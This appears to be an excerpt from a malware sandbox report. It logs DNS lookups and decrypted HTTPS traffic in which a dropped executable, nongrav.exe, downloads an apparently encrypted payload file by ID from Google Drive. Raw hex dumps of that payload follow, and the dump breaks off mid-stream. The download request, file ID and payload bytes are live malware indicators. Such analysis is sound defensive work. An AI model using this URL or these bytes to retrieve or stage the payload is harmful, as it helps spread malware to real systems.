Dec 15, 2021 14:13:47.532352924 CET	58540	53	192.168.2.3	8.8.8.8
Dec 15, 2021 14:13:47.557713032 CET	53	58540	8.8.8.8	192.168.2.3
Dec 15, 2021 14:13:48.603138924 CET	55108	53	192.168.2.3	8.8.8.8
Dec 15, 2021 14:13:48.630215883 CET	53	55108	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 15, 2021 14:13:47.532352924 CET	192.168.2.3	8.8.8.8	0x4b1d	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 15, 2021 14:13:48.603138924 CET	192.168.2.3	8.8.8.8	0x5477	Standard query (0)	doc-0c-ao-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 15, 2021 14:13:47.557713032 CET	8.8.8.8	192.168.2.3	0x4b1d	No error (0)	drive.google.com		172.217.168.46	A (IP address)	IN (0x0001)
Dec 15, 2021 14:13:48.630215883 CET	8.8.8.8	192.168.2.3	0x5477	No error (0)	doc-0c-ao-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 15, 2021 14:13:48.630215883 CET	8.8.8.8	192.168.2.3	0x5477	No error (0)	googlehosted.l.googleusercontent.com		172.217.168.1	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-0c-ao-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49837	172.217.168.46	443	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-15 13:13:48 UTC	0	OUT	GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-12-15 13:13:48 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 15 Dec 2021 13:13:48 GMT Location: https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-EMXjOSw4Y96UYi94oVhyrg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=XU9cPhkPEzophwyh3MGRmWojEC8XYsCGUUVP6Xpqww4mZOveOqwpw9LswvCggWgLghsUnufCd-udYmc2G9SprDfT_qeCcigMPM-e7iTdF6KKL0f7o5y54m9VMjYjAJPiqx243dRWK3_A5drOGaroDMJUdFdTi2GeepTp1DPkEWc; expires=Thu, 16-Jun-2022 13:13:48 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-15 13:13:48 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 61 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 75 62 66 33 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3
2021-12-15 13:13:48 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49838	172.217.168.1	443	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-15 13:13:48 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0c-ao-docs.googleusercontent.com Connection: Keep-Alive
2021-12-15 13:13:48 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdv26AmqCAkUuCC8XjAmfSVQ6tFuZ4Bys0cnWeMxpGn3x0acHygtOgTHWktUsFvCah2tswGnAPz-B4P5DSK-JmxSQU0b9g Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/macbinary Content-Disposition: attachment;filename="XL bin_zuCGjTEmqF178.bin";filename*=UTF-8''XL%20bin_zuCGjTEmqF178.bin Content-Length: 167488 Date: Wed, 15 Dec 2021 13:13:48 GMT Expires: Wed, 15 Dec 2021 13:13:48 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=063w5A== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-15 13:13:48 UTC	6	IN	Data Raw: d6 c3 1b 41 ba 63 42 f4 79 05 64 19 72 7a 75 ba 64 6d 07 b3 f2 83 29 f1 87 b6 f9 c4 72 74 ee 54 d4 01 42 81 55 2d 74 d2 a0 75 17 6d e3 0d 4e fa 17 79 e4 87 39 85 9c 35 ae da 2c a9 25 12 31 eb 52 83 fd 2d 77 d9 54 b9 66 7e b5 cd 1f 6c 7e c3 de 0b 1b 2b 7a 26 dd f2 7b e5 33 46 d8 8a 13 2e 25 d0 91 a2 df 43 6c 4f bb 9f db a7 d8 60 da e6 94 a1 88 19 9d 12 75 bf dd 6e 4c 22 19 c4 76 02 fa 17 72 ec 65 ac 93 a4 e3 1b 1c 87 ba ab 39 c9 ec ff 83 e0 65 8f 0f 56 81 c8 a4 c5 3b 45 16 f5 4e bc 3f 50 7d b6 af 65 87 71 f8 07 3b d2 61 83 c2 6b 17 d4 00 1a 66 21 cf 5d 88 7c 2c db 3d c4 07 bd 45 3b 80 20 18 1c 7b 65 66 af d4 75 cb b6 8d 4d 0e 28 89 cf f3 7f e8 64 2d ad ed 16 93 07 16 6b 52 c9 ef 77 9d d0 a4 0a 53 97 c2 ae 49 5b e6 f2 34 5a 96 0f aa 49 8a b6 2f ed e4 36 dc Data Ascii: AcBydrzudm)rtTBU-tumNy95,%1R-wTf~l~+z&{3F.%ClO`unL"vre9eV;EN?P}eq;akf!]\|,=E; {efuM(d-kRwSI[4ZI/6
2021-12-15 13:13:48 UTC	9	IN	Data Raw: 63 5c e5 4a 67 5c 00 eb e8 bb 95 b7 19 f7 f4 3a f2 49 5b bf 2e be 57 30 e0 46 3d 63 24 ac 90 8d a6 61 5d de 00 87 e1 7d 2a 9e 0e 51 17 b3 45 21 0b 7e 7e d5 13 10 da 88 6e 06 2a a1 e6 43 19 c0 99 93 8f 65 74 be 19 1e 77 c9 da 7b 52 42 31 65 ed 4b 8b 34 85 04 6b 46 4b 3e d4 fa 28 cb 0f 5d 11 63 95 21 3b f5 9d 9f 5a 87 ef 5e ff 93 6e cf f3 bf 75 02 fb d4 a0 89 9a ae 6a cc 51 04 f1 c9 93 81 90 9b a0 22 75 f3 07 4d 2c e8 8b cb 81 d6 34 65 8d 8c 45 a1 9d 9d 54 de 7e 64 30 00 ae d4 3e 68 de e1 88 e5 30 5d cf 35 98 b2 18 99 cd d0 66 20 e1 28 82 59 1f d9 b8 7f 9f d9 54 b9 66 26 36 25 16 e7 b6 40 1e 37 90 2b 79 e7 5e 32 53 e6 3b b9 39 1a 13 2e 25 d0 91 a2 df 43 6c 4f bb 9f db a7 d8 60 da e6 94 a1 88 19 9d 12 75 bf dd 6e 4c 22 a1 c4 76 02 f4 08 c8 e2 65 18 9a 69 c2 Data Ascii: c\Jg\:I[.W0F=c$a]}QE!~~nCetw{RB1eK4kFK>(]c!;Z^nujQ"uM,4eET~d0>h0]5f (YTf&6%@7+y^2S;9.%ClO`unL"vei
2021-12-15 13:13:48 UTC	13	IN	Data Raw: b4 05 6a 6c bd 3f 97 22 48 ef f7 b2 a6 f9 d0 85 2f ce 79 b0 26 2f 1c bf 57 74 04 b4 11 8f bf 6b a7 96 c0 af fa 29 37 02 38 c7 8a 8d af e1 65 00 3e 2e 57 d4 dc 65 46 57 25 08 dd d9 15 9a be ff 15 b0 f3 23 a6 06 63 e1 8a 4b cc 25 77 a1 a3 33 3a e2 e4 98 25 ac 69 28 8e af b5 01 bf 82 0a ca c5 eb 88 bc c6 1e 25 cd 42 35 51 f4 fb aa f9 30 9a cb 5c be 97 2f 9c 5b 11 be 94 9b 85 37 15 44 6a 92 f3 1d 3b fd 77 a9 a6 40 d1 11 32 55 2a 81 b8 87 d9 53 6f 03 dc 1b a9 19 85 6f 1c 82 d5 77 a0 ff 50 74 c0 cd f6 81 81 cd 1b 18 ca 4f eb f6 d7 5e 19 96 a3 7a f6 54 0a 91 89 41 e6 96 0f b1 2a bc d7 ba cc 9a 12 24 ae 11 cf c3 ee ba b6 c1 2b 88 06 e5 53 9a 94 63 6b de c4 d1 81 83 62 40 6a 5a 01 6c 91 3e 55 19 22 c5 7e dc 5e 76 65 69 de 78 22 c3 74 c5 6d 7e 6f ca 66 e4 e2 34 82 Data Ascii: jl?"H/y&/Wtk)78e>.WeFW%#cK%w3:%i(%B5Q0\/[7Dj;w@2USoowPtO^zTA$+Sckb@jZl>U"~^veix"tm~of4
2021-12-15 13:13:48 UTC	17	IN	Data Raw: 5a 7e 63 78 c2 ef a0 f1 49 1c 7a 1c 56 ba 76 35 a3 7a 7a 94 ef a1 50 3a ca 84 5f 7b a2 c9 0a 3f 5c 3c c9 de 03 d1 d8 c3 bd 21 9b 0d 38 34 3a 7d 59 ad a1 2f f0 1c 2d ca 97 08 54 14 d6 f7 bb 26 a9 c0 7f 52 77 f1 db 4c d8 43 a3 16 17 28 c6 8e b4 26 d0 d0 1c 40 a2 17 52 26 4c f1 a8 00 31 0d e2 6e 7c 2d b7 c0 98 8d 1b d9 bf 6c 69 90 49 f9 ed 22 3a a0 ea 8b 76 26 fc 53 d9 fa 7e be 70 21 72 9e 75 32 28 f2 57 c1 78 7d 3e c9 cb 7c da 07 7c bf 10 33 88 b3 0c 11 c5 71 c0 53 30 a5 f0 0f ff 7c a3 d8 62 01 3e 66 5c 30 83 5c 3d 68 27 1f dd 27 99 17 34 c8 13 b0 1a 59 af 17 b0 6b 65 07 ac b0 49 36 5c e5 74 ac f5 da 50 9a 6b 28 21 c2 52 ac a7 cc b1 f2 41 67 76 08 c2 72 f9 0a c7 6c 39 fb f2 af 50 34 bb 8a dd 62 6a d0 33 b4 84 39 66 5c 68 eb e9 bb 95 3a 94 f7 0b c5 0d 18 d6 Data Ascii: Z~cxIzVv5zzP:_{?\<!84:}Y/-T&RwLC(&@R&L1n\|-liI":v&S~p!ru2(Wx}>\|\|3qS0\|b>f\0\=h''4YkeI6\tPk(!RAgvrl9P4bj39f\h:
2021-12-15 13:13:48 UTC	18	IN	Data Raw: 87 cc 5e e6 43 19 4b ed 23 8b a4 ba ae d8 d5 7f fa 29 f0 8d c3 d2 9a ed 4b 8b bf d9 9c 6f 87 88 36 e7 09 a3 96 f3 9c ea 7b 14 c2 c4 f5 9d 9f 69 f3 77 5a cc e2 7a 44 ae 47 b4 f9 eb 15 5f 81 1b 4d 95 cc 51 04 7a 95 0b 85 11 7c 5f 22 75 f3 8c 31 94 ec 4a 00 89 17 fb 75 be 53 ce dc 61 1c b3 21 7e 64 30 8b d2 6c 3a a9 19 e9 bb 3a bb 20 23 f4 67 aa 99 7e 32 d0 66 20 d2 74 3a 5d 94 a4 44 4c c6 c1 95 46 6e af 6b d1 9d ba 46 81 e5 27 11 cc 86 e7 5e 32 d8 9a 83 bd b8 f9 ec 2e 25 d0 1a fe 47 47 ad 80 ab 5e 10 af eb 9b 51 bb 78 20 6b e6 9d 12 75 34 81 f6 48 e3 62 cc 45 f9 7f 55 30 23 9e 00 1b 8a 3d a3 1d cb 44 f6 f5 a5 06 4d 83 a3 6e 1c e1 59 18 2e f9 ae 8b d4 37 13 47 94 52 b1 25 c6 da 0b 4c 1e 1b bc 7f 9d 32 a3 24 79 87 70 d1 1f ea cc 14 5d 88 7c a7 a7 85 c0 bb 14 Data Ascii: ^CK#)Ko6{iwZzDG_MQz\|_"u1JuSa!~d0l:: #g~2f t:]DLFnkF'^2.%GG^Qx ku4HbEU0#=DMnY.7GR%L2$yp]\|
2021-12-15 13:13:48 UTC	19	IN	Data Raw: f7 7a 28 ba 40 0a b7 4b 17 7d dd 59 24 42 70 0c 0d 03 fb 65 10 10 8e ad 54 7b f9 20 5e 2a c6 6f 66 c9 75 a4 56 b9 93 be 3c 48 66 4a 84 b4 f4 63 8a f8 6a 75 1b 11 f5 2b c3 86 c6 cd f4 68 5e e8 fb ed e8 f9 e6 d2 1f b7 3a 0a 15 9b fc ee e9 05 63 fd 7f 5d 02 ea 1f 10 93 1b ad 50 e1 b9 20 fe cd 37 1e 7b a8 db 40 b8 b5 10 21 59 7c 8a 09 50 38 c9 78 d2 90 72 0e e6 9e fc f6 3c b9 c1 ee f8 29 4b 9f 07 ad 27 a6 e5 8e a8 73 cc 64 7d 70 11 7d 1c 11 48 57 77 de 74 9c fa 34 f8 80 0e dc 59 08 b6 64 d3 21 90 12 75 dd 98 ed 29 6f 2b 1d ee b3 2f 9d c9 04 49 23 1a 13 04 6f 34 43 21 3b 55 9a cd 67 c6 e1 2f cf 00 d5 6f 12 3c 6a 5a 5a 2c 8c 17 5f ad 3f 91 14 74 e0 8e 38 a9 f1 45 83 f0 7d ba 3c ae 3a ee ca 4e b5 1f 32 28 ee 28 93 c1 00 f2 27 5f 55 45 8f b3 2d c2 99 64 50 17 30 Data Ascii: z(@K}Y$BpeT{ ^*ofuV<HfJcju+h^:c]P 7{@!Y\|P8xr<)K'sd}p}HWwt4Yd!u)o+/I#o4C!;Ug/o<jZZ,_?t8E}<:N2(('_UE-dP0
2021-12-15 13:13:48 UTC	21	IN	Data Raw: 77 db 7a a3 7d 23 16 0a fa 66 37 e7 ed 29 11 1b f2 14 77 99 cd bc ad b4 33 cc 96 ef 54 e8 f6 3b 31 72 67 b8 a2 6a 41 ce 08 50 f0 7a 29 dd 09 92 da ca 6c 16 d8 48 df 4a 53 b6 d3 ad 93 f5 af 48 5e d8 7e b2 04 57 3f ee 97 90 68 2a 91 00 f8 84 f3 1f a6 04 d9 89 d2 99 be 78 9b 9d 28 80 dc f7 ec b1 94 a4 be 0b 39 10 46 5e 75 3f 60 73 bf 5c b4 8b e4 f3 6a fb 0a 0d 7d 01 cb 4d 2c e2 53 4f 9d 1d 57 36 64 2d 4d 73 25 d6 4f ef 87 aa 2b bc 78 fa dc 44 21 de 56 a8 e2 a9 a5 65 5b 3d 5a ce 23 91 43 fb 44 9b ff 4b b2 7f de a3 58 33 f1 07 9a fa 29 f3 9c 76 be 82 73 0b bd b6 49 5f 77 f8 2e 0e de b8 f7 10 c5 33 20 1f 4e 87 6e b2 7d 57 0f fd 92 22 58 04 49 ec c9 73 e5 03 a3 40 1f b5 45 c8 f3 1e ea 1c 72 34 b7 f2 2a 76 0e 63 d4 76 30 e8 87 7a 55 ed be 76 c3 ba 2d 91 74 38 90 Data Ascii: wz}#f7)w3T;1rgjAPz)lHJSH^~W?hx(9F^u?`s\j}M,SOW6d-Ms%O+xD!Ve[=Z#CDKX3)vsI_w.3 Nn}W"XIs@Er4vcv0zUv-t8
2021-12-15 13:13:48 UTC	22	IN	Data Raw: e2 4c ba 4b 04 2e 96 6f 70 11 da 0b aa 02 a7 2d a3 33 ec 3f 66 c2 d9 8d fd e0 19 1e fa 9c 6e 29 ba e2 52 64 ed c8 4f 20 86 c4 3b cb 0e 8a 84 77 a5 bb fa a2 ee 32 7d ab 58 f4 9d 12 ce c2 bd ab 00 6c ed 0b f7 ed 9d 88 9b d5 a0 04 17 56 94 33 ae 8f 20 71 d3 81 90 9b f2 44 fc b6 99 c4 61 48 63 ab e2 d7 34 66 4d ea cc e4 01 f5 4d dc 7c 64 bd 85 de 21 c1 97 8e 6c c5 7d 61 0b 27 a1 eb b2 18 1a 09 f0 e3 e0 95 40 0f 0c f3 8b 33 2a 07 b1 54 b8 66 26 bb a0 66 1c 49 bf 4e 5d 91 a6 34 7b 0f 60 05 0e 36 fa 38 1a 90 ea 39 55 51 d7 9e c8 e9 37 40 60 24 2a 54 65 aa 1d 6b 5e d9 4a 75 f0 17 be dd e3 d8 1a 05 40 76 02 77 cc cc b0 8d ba fc 68 c2 28 98 b3 8c 75 92 2c 09 89 d3 6b e8 1f 39 a9 75 dd 79 59 a5 79 90 12 5c 9d 5d b6 99 d4 57 8e df e5 69 d8 2f ca da 7b 5a fb 8c 32 ea Data Ascii: LK.op-3?fn)RdO ;w2}XlV3 qDaHc4fMM\|d!l}a'@3Tf&fIN]4{`689UQ7@`$Tek^Ju@vwh(u,k9uyYy\]Wi/{Z2
2021-12-15 13:13:48 UTC	23	IN	Data Raw: be 0f cc 62 ae 06 6a 3f fa cd 3a 8d 70 12 24 a9 5b 28 dd 69 60 a3 d0 d5 b2 c3 ed 26 1b 21 f1 34 3a c5 69 46 65 3f 75 ea 09 8b 3a 0f d7 e5 58 37 b6 e1 67 5d 5e 34 c9 66 74 08 04 d4 ea da 07 39 dc 5d d4 98 60 78 86 c6 59 e8 96 ff e1 63 66 04 78 0a 39 56 bb 68 08 14 40 69 76 2d 21 a7 85 b4 c9 3f 2a 67 ce 7c a4 42 5f 65 16 ab 38 93 3c b7 88 e9 cb 6a 07 6e dd 68 72 d9 39 d9 c0 c8 44 35 72 aa fe 1a 06 58 10 a2 2c da 30 1f 8a 83 68 09 8c 36 f8 1c c2 f9 cd ff c1 f1 55 fb ef 7d 90 c4 88 a1 ca f3 60 17 bf b3 60 f7 ca ec 62 91 c2 58 53 72 4a ed 8a d3 d1 43 8f 53 87 6c 60 33 c5 b1 f8 ca bc 53 09 ba 67 68 63 15 77 5f 42 ae a0 0b c7 e2 6c 88 c0 40 92 9a 35 0c d9 11 55 80 ee c9 45 b1 98 a3 57 b9 00 69 cf b6 19 74 30 36 7f 1c bb 32 ab 1e ac cf 1f ff 29 67 24 ac c2 04 fb Data Ascii: bj?:p$[(i`&!4:iFe?u:X7g]^4ft9]`xYcfx9Vh@iv-!?*g\|B_e8<jnhr9D5rX,0h6U}``bXSrJCSl`3Sghcw_Bl@5UEWit062)g$
2021-12-15 13:13:48 UTC	24	IN	Data Raw: e2 78 ff 15 7d ea 5d 0b b8 24 84 63 7c 7b db 7a 20 e2 7a 8a 98 17 e9 db 66 01 1a 9b fe af 54 89 6c fc c7 26 e0 cb fe e2 66 aa 01 c2 40 b0 3c 9f 81 d7 23 9a cf c5 a3 58 01 fb a9 18 43 6b 7f ae a4 69 f0 fb 2f 53 76 b7 13 57 c8 35 72 8b 20 4a 4c 69 d4 f1 94 c4 da 60 7a f5 83 42 b9 be e3 fa 87 1d 85 4a 82 15 dd 7e a5 eb cc ec ff 11 47 84 ab 5b 7b 55 9c 8b 81 50 d0 64 2d e5 d7 51 d6 e0 f0 87 ea 7f 18 f4 54 c3 1b 11 b4 36 10 16 e3 a8 4a f0 77 fa f0 2d 5d aa d8 44 a4 9f 72 5c 5d c4 99 3b 76 f9 12 8b 90 fe 64 d8 93 5a 21 e6 76 15 44 b8 64 0f 76 3f f4 4c c4 59 56 d7 91 64 05 55 66 78 e6 b8 d8 f8 63 74 30 52 58 b1 08 28 10 26 15 e0 e4 f5 3a 76 22 1c e2 e6 4e 2d da 01 a1 60 82 f9 0e 2a 14 ce b1 d6 a9 f8 a1 fb 65 38 b7 e8 9a f2 f4 35 29 20 8c 10 92 82 36 35 8f 36 e8 Data Ascii: x}]$c\|{z zfTl&f@<#XCki/SvW5r JLi`zBJ~G[{UPd-QT6Jw-]Dr\];vdZ!vDdv?LYVdUfxct0RX(&:v"N-`*e85) 656
2021-12-15 13:13:48 UTC	26	IN	Data Raw: 0c 4a b1 5f de 00 d4 6a 20 26 c9 8b 8a 18 37 63 20 0b 7e f5 a8 03 95 25 87 ea 1d 2b a1 e6 29 66 4d 1c a2 72 9a 8b d4 19 4e b1 4c ea 86 ad bd 31 8d 35 1a 8a 34 b6 cd 03 b8 4b 3e d4 ab a5 5e 3d a3 ee 9c c7 47 b2 78 ad 61 a5 78 07 e3 ae 92 6e a5 8c 32 f0 b3 06 2b 5f e3 9a fe ac 49 e1 f9 0e 36 93 69 36 ca a1 22 46 3a 6d 7b 7d 65 de 0d d3 11 71 69 d1 8c 45 a1 5a d8 e8 f0 7e 01 30 c7 eb 14 46 68 bb e1 ee 6c 7d 99 27 4a c9 b3 18 aa 04 ba 50 71 6c 7d 04 0b d8 5c c4 80 60 26 7a b9 02 26 f1 60 96 8b b6 2c 1e 51 19 66 fd 0f 02 63 52 e6 b6 fd 02 e5 90 ea 19 50 a9 93 aa 2b aa 4f bb 26 da a7 d8 60 5a de ba d5 cf 58 d5 91 8c b1 af 9a 1a 48 a9 49 33 be a4 85 45 9e 9a e7 65 38 2a 1a 4e ca 77 09 a9 ad 0c c9 5f 15 d7 94 10 9c e1 a5 84 a6 d7 5f 67 65 b7 07 5d 35 5d c4 50 05 Data Ascii: J_j &7c ~%+)fMrNL154K>^=Gxaxn2+_I6i6"F:m{}eqiEZ~0Fhl}'JPql}\`&z&`,QfcRP+O&`ZXHI3Ee8*Nw__ge]5]P
2021-12-15 13:13:48 UTC	27	IN	Data Raw: 09 45 2f 0e 40 19 36 c1 1b ec c5 07 b3 bf 84 db 6b ae c6 c2 96 88 45 74 8d 70 f9 de a9 5b cd 70 df 4f 29 45 56 1c 8b ed 98 cb 42 09 34 b9 8a 9d 46 59 1f 86 49 2a ae 99 1c 0d b1 26 ef 4d 1e 13 95 07 5b 5f e3 99 61 ff 2f 95 da 9e 66 8c 86 96 96 ea 9d 56 88 2e 42 87 2c ad 60 05 4d 09 19 a6 61 69 3a d6 c6 a3 eb 85 e1 aa 11 f3 d3 b6 78 d5 36 a8 93 8a b5 0c b1 b8 ab b5 06 02 26 48 9b dc 9d bc 41 a5 ca 2d b2 42 aa 9e 45 4c 10 29 3f 06 23 12 cf 77 a3 7c b9 4f 5b 06 d6 43 dd 53 fb e4 4a a9 99 90 7a 01 ed 1f df 85 9a c3 e3 c7 a7 ca e4 d6 16 bf b3 1e 28 05 dc 59 61 76 64 6a 01 dc 85 71 a1 a3 b3 9c 07 33 5e a0 e3 50 c7 1b 4f 91 ed 1a 15 02 97 50 ef 88 f7 fb 9a 0b 45 c6 e1 c6 0b 89 05 7f 34 bb 89 b1 9d 95 2f 33 b4 01 05 66 5c 8d 66 80 40 6a 48 48 a1 1c 3d 02 b6 a4 e9 Data Ascii: E/@6kEtp[pO)EVB4FYI*&M[_a/fV.B,`Mai:x6&HA-BEL)?#w\|O[CSJz(Yavdjq3^POPE4/3f\f@jHH=
2021-12-15 13:13:48 UTC	28	IN	Data Raw: da 0b a8 9c 24 27 7f 9d 64 f4 c7 02 71 b1 2e 47 e6 a6 11 a0 77 83 7d bd b4 41 82 26 85 df 51 9d 0e 55 42 e9 42 eb 60 cc b6 74 af d7 a3 88 e7 82 a3 37 c9 3e b2 68 42 e9 3f b0 cb a6 cc 69 cc 37 cd 98 7b e6 c8 02 04 56 48 fb 19 bb 35 5a 2f 53 aa 49 da 7e 91 01 24 37 dd f0 bb a8 c6 82 e4 21 85 ed f4 3b 29 7b c6 d2 d4 5a f8 df f6 0a 88 7d 70 38 1a a4 2c 28 38 42 a8 0b e4 c3 a4 53 c0 0d ff e7 88 05 a8 91 b7 6b e5 d7 da 45 23 7d 93 ca fc dc fa 3e c3 96 f6 48 46 6a 71 4c a8 67 ca 21 78 37 ff 9b 46 38 44 29 84 dd e5 ee b1 01 c5 0a c2 50 94 13 bf a5 87 0e 8a 15 b8 15 22 5e 7b 46 10 43 9d 26 d9 6e df d5 4a b3 07 84 04 62 1b c5 61 35 e4 ea e0 75 9c 2d 3b ff 28 6a 22 4a 08 9b 90 